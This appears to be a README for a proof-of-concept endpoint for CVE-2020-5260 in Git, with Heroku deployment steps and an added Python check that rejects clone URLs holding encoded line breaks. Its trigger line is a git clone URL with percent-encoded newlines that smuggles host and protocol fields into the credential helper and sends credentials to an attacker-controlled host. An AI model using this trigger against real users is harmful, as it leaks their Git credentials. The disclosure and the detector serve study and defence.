cve-2020-5260
An HTTP PoC endpoint for cve-2020-5260 which can be deployed to Heroku
CREDIT INFORMATION
Felix Wilhelm of Google Project Zero https://bugs.chromium.org/p/project-zero/issues/detail?id=2021
Trigger the vuln
git clone 'https://YourHerokuAppNameAndNotMine.herokuapp.com?%0ahost=github.com%0aprotocol=ssh'
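A pre-clone check for URLs shaped like the trigger above, as an added example that is not part of the original PoC repository: it percent-decodes the URL and rejects it when a line break appears, since the credential helper protocol is a newline-delimited list of key=value lines. The function names and the sample URLs in the demo are assumptions made for this example.

```python
from urllib.parse import unquote, urlsplit

# Characters that end a line (or a string) in a newline-delimited key=value stream.
LINE_BREAKERS = ("\n", "\r", "\x00")


def find_line_breaks(url):
    """Return {component: decoded_value} for every URL part that holds a
    raw or percent-encoded CR, LF or NUL. Empty dict means none found."""
    # Check the raw string first: urlsplit() on current Python versions
    # silently strips raw CR/LF/TAB, which would hide them from us.
    if any(ch in url for ch in LINE_BREAKERS):
        return {"raw": url}
    parts = urlsplit(url)
    hits = {}
    # urllib's component boundaries are not the same as git's own URL
    # parsing, so every component is checked rather than only the host.
    for name in ("netloc", "path", "query", "fragment"):
        decoded = unquote(getattr(parts, name))
        if any(ch in decoded for ch in LINE_BREAKERS):
            hits[name] = decoded
    return hits


def smuggled_lines(url):
    """Return the extra key=value lines that appear once the URL is decoded,
    useful as detail for a log entry or an alert."""
    rest = url.split("://", 1)[-1]
    return [ln for ln in unquote(rest).splitlines()[1:] if "=" in ln]


def is_safe_to_clone(url):
    """True when no component decodes to a line break or NUL."""
    return not find_line_breaks(url)


if __name__ == "__main__":
    # Constructed samples: the trigger URL from this README and the repo URL.
    samples = [
        "https://YourHerokuAppNameAndNotMine.herokuapp.com"
        "?%0ahost=github.com%0aprotocol=ssh",
        "https://github.com/brompwnie/cve-2020-5260",
    ]
    for u in samples:
        verdict = "ok" if is_safe_to_clone(u) else "REJECT"
        print(verdict, u, smuggled_lines(u))
```
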
Get PoC onto Heroku
Click this button to automagically deploy to Heroku...
Or follow the steps below...
Yes, I understand the irony of having to run Git clone commands to set up this PoC....
Install the Heroku CLI via https://devcenter.heroku.com/articles/heroku-cli
If you haven't already, log in to your Heroku account and follow the prompts to create a new SSH public key.
$ heroku login
Clone the repository
Use Git to clone cve-2020-5260's source code to your local machine.
$ mkdir cve-2020-5260
$ cd cve-2020-5260
$ git init
$ heroku apps:create cve-2020-5260
$ git clone https://github.com/brompwnie/cve-2020-5260
Deploy your changes
Make some changes to the code you just cloned and deploy them to Heroku using Git.
$ git add .
$ git commit -am "make it better"
$ git push heroku master